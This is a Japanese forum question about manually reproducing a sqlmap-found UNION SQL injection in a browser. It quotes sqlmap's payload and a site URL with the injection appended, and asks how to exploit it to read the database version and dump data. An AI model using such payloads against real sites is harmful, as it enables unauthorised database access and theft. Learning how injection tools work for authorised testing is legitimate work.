SQLmap の仕組みを理解しようとしています。
たとえば、sqlmapは私のサイトでインジェクションを見つけます -
Place: GET
Parameter: selected
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
SQLmap を使用してデータベースをダンプできますが、ブラウザーから同じデータベースをダンプするにはどうすればよいですか? 次のリンクをブラウザに入れようとしましたが、うまくいきませんでした -
http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
ブラウザでまったく結果が得られません。/**/ や + などを入れるさまざまな方法を試していますが、うまくいきません。
侵入テストのためにSqlmapが送信するリンクを取得するには?
このインジェクションで単純な select version() クエリを悪用する方法は?
多分これは本当に機能していませんか?